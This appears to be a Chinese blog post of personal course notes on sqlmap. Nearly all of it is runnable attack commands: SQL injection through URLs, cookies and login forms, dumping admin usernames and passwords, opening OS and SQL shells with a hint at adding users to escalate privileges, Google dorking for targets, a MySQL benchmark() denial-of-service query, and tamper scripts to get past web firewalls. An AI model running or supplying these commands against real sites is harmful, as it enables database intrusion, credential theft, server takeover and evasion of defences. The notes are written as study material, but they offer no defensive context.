整理的SqlMap笔记
整理的SqlMap笔记
看课程时,整理的笔记。
SQLMAP安装及access注入
注入点
./sqlmap.py -u "URL"
//-u指定URL,判断是否有注入
--tables
//猜表,access是跑表,线程最大为10
--columns -T admin
//对字段进行猜解,线程自定义
--dump -T admin -C "username,password"
//猜解内容,--dump显示内容
MySQL数据库注入
KALI Linux环境
注入点
sqlmap -u URL --dbs
//-u 指定URL,获取数据库
sqlmap -u URL -D dataname
//dataname指定数据库名,-D指定数据库
//获取指定数据库中的表
//与access不同,MySQL是爆表
sqlmap -u URL -D dataname -T 表名 --columns
//爆破表内容
sqlmap -u URL -D dataname -T 表名 --columns -c id,user,password --dump
//获取字段内容
Cookies注入
注入点
sqlmap -u "URL" --cookie "id=9" --table --level 2
//获取数据表名列表
sqlmap -u "URL" --cookie "id=9" --columns -T admin --level 2
//获取表名
sqlmap -u "URL" --cookie "id=9" --dump -T admin -C "username,password" --level 2
//显示表的内容
post登录框注入
几种注入方式:
./sqlmap -r seach-test.txt -p tfUPass
//-r指定文本,-p指定参数
BurpSuite抓包
sqlmap -u URL --forms
//-u指定URL,自动搜索
sqlmap -u URL --data "tfUName=1&tfUPass=1"
//指定参数搜索
交互写shell及命令执行
sqlmap -u URL --os-cmd=ipconfig
//需要目标站的根目录
sqlmap -u URL --os-shell
//获取shell,只要权限够大,可建用户(提权)
伪静态注入
sqlmap -u URL/xx*.html --dbs
//在xx后加上*,--dbs获取数据库
sqlmap -u URL/xx*.html -D 数据库名 --tables
//跑数据库
sqlmap -u URL/xx*.html -D 数据库名 -T 表名 --columns
//跑表的字段
sqlmap -u URL/xx*.html -D 数据库名 -T 表名 -C password
//-C 获取password字段内容
请求延时
注入点
参数 --delay --safe-freq
sqlmap --dbs -u URL/xx*.html --delay 1
//--delay 延时1S
sqlmap --dbs -u URL/xx*.html --safe-freq 3
//更加人性化,--safe-freq 3代表次数
Google搜索
sqlmap -g inurl:php?id=1
//-g使用Google搜索
MySQL DOS攻击
注入点
select
benchmark(99999999999,0x70726f62616e646f,0x70726f62616e646f0x70726f62616e646f)
sqlmap -u URL --sql-shell
//获取一个shell
//执行benchmark()函数
绕过WAF防火墙
sqlmap -u URL -v 3 --dbs --batch --tamper "space2morehash.py"
//使用编码脚本绕过
space2hash.py base64encode.py charencode.py
//其他编码脚本,加密方式不一样
//不同脚本可能针对不同数据库和版本
taps:
sqlmap -u URL --privileges
//查看一下权限
最后由 不一样的少年 编辑于2016年05月17日 23:07